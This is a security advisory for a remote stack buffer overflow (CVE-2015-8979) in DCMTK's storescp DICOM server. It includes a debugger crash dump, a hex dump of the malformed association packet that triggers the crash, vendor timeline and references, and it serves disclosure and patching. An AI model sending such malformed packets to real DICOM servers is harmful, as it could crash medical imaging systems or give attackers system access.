DCMTK storescp DICOM storage (C-STORE) SCP Remote Stack Buffer Overflow

Title: DCMTK storescp DICOM storage (C-STORE) SCP Remote Stack Buffer Overflow
Advisory ID: ZSL-2016-5384
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 16.12.2016
Summary
DCMTK is a collection of libraries and applications implementing large parts the DICOM standard. It includes software for examining, constructing and converting DICOM image files, handling offline media, sending and receiving images over a network connection, as well as demonstrative image storage and worklist servers. DCMTK is is written in a mixture of ANSI C and C++. It comes in complete source code and is made available as "open source" software.
Description
"At several places in the code a wrong length of ACSE data structures received over the network can cause overflows or underflows when processing those data structures. Related checks have been added at various places in order to prevent such (possible) attacks. Thanks to Kevin Basista for the report."

The bug will indeed affect all DCMTK-based server applications that accept incoming DICOM network connections that are using the dcmtk-3.6.0 and earlier versions. Developers are advised to apply the patched-DCMTK-3.6.1_20160216 fix commit from Dec 14, 2015.

--------------------------------------------------------------------------------

Process 27765 stopped
* thread #1: tid = 0x3e4b46, 0x00000001000a6f1d storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x10380001b)
frame #0: 0x00000001000a6f1d storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325
storescp`parsePresentationContext:
-> 0x1000a6f1d <+3325>: movb (%rax), %al
0x1000a6f1f <+3327>: movzbl %al, %eax
0x1000a6f22 <+3330>: cmpl $0x40, %eax
0x1000a6f25 <+3333>: movl %eax, -0xa74(%rbp)
(lldb) re r
General Purpose Registers:
rax = 0x000000010380001b
rbx = 0x0000000000000000
rcx = 0x00000001002d40f0 vtable for log4cplus::spi::AppenderAttachable + 16
rdx = 0x0000000000000010
rdi = 0x00007fff5fbf78a0
rsi = 0x3f7bc30000000000
rbp = 0x00007fff5fbf7b30
rsp = 0x00007fff5fbf7030
r8 = 0x0000000100733918
r9 = 0x00000000003e4b46
r10 = 0x0000000100733920
r11 = 0xffffffff00000000
r12 = 0x0000000000000000
r13 = 0x0000000000000000
r14 = 0x0000000000000000
r15 = 0x0000000000000000
rip = 0x00000001000a6f1d storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325
rflags = 0x0000000000010246
cs = 0x000000000000002b
fs = 0x0000000000000000
gs = 0x0000000000000000

(lldb)

=====

➜ bin ./storescp -d 4242
D: $dcmtk: storescp v3.6.0 2011-01-06 $
D:
D: setting network receive timeout to 60 seconds
D: PDU Type: Associate Request, PDU Length: 32881 + 6 bytes PDU header
D: Only dumping 512 bytes.
D: 01 00 00 00 80 71 00 01 00 00 4f 52 54 48 41 4e
D: 43 20 20 20 20 20 20 20 20 20 54 45 53 54 53 55
D: 49 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00
D: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
D: 00 00 00 00 00 00 00 00 00 00 10 00 00 15 31 2e
D: 32 2e 38 34 30 2e 31 30 30 30 38 2e 33 2e 31 2e
D: 31 2e 31 20 00 80 00 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D: 42 43 44 41 42 43 44 41 42 43 44 41 42 43 44 41
D:
D: Parsing an A-ASSOCIATE PDU
[1] 25553 segmentation fault ./storescp -d 4242
➜ bin

--------------------------------------------------------------------------------

Vendor
OFFIS e. V. - http://www.dcmtk.org
Affected Version
<= 3.6.0
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
MacOS X 10.12.2 Sierra
Linux Ubuntu 14.04.5
FreeBSD 10.3
Vendor Status
[14.12.2016] Vendor informed.
[14.12.2016] Vendor confirms the issue, it was fixed in the 1b6bb76 commit (v3.6.1), scheduling official stable release 3.6.2 in Feb/Mar 2017.
[16.12.2016] Public security advisory released.
PoC
storescp_bof.py
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://github.com/commontk/DCMTK/commit/1b6bb76
[2] https://www.exploit-db.com/exploits/40928/
[3] https://packetstormsecurity.com/files/140191
[4] https://cxsecurity.com/issue/WLB-2016120098
[5] http://www.vfocus.net/art/20161219/13214.html
[6] https://bugs.gentoo.org/show_bug.cgi?id=602918
[7] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8979
[8] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8979
[9] http://www.securityfocus.com/bid/94951
[10] https://exchange.xforce.ibmcloud.com/vulnerabilities/119844
[11] http://forum.dcmtk.org/viewtopic.php?f=1&t=4498
[12] https://security-tracker.debian.org/tracker/CVE-2015-8979
[13] http://www.linuxcompatible.org/news/story/dcmtk_security_update_for_debian.html
[14] http://www.debian.org/security/2016/dsa-3749
[15] https://www.tenable.com/plugins/index.php?view=single&id=95955
[16] https://www.tenable.com/plugins/index.php?view=single&id=96193
[17] http://plugins.openvas.org/nasl.php?oid=703749
[18] https://vulners.com/zeroscience/ZSL-2016-5384
[19] https://bugzilla.redhat.com/show_bug.cgi?id=1405919
Changelog
[16.12.2016] - Initial release
[20.12.2016] - Added reference [2], [3], [4], [5], [6], [7], [8] and [9]
[24.12.2016] - Added reference [10]
[29.12.2016] - Added reference [11], [12] and [13]
[31.01.2017] - Added reference [14], [15], [16], [17] and [18]
[13.04.2017] - Added reference [19]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk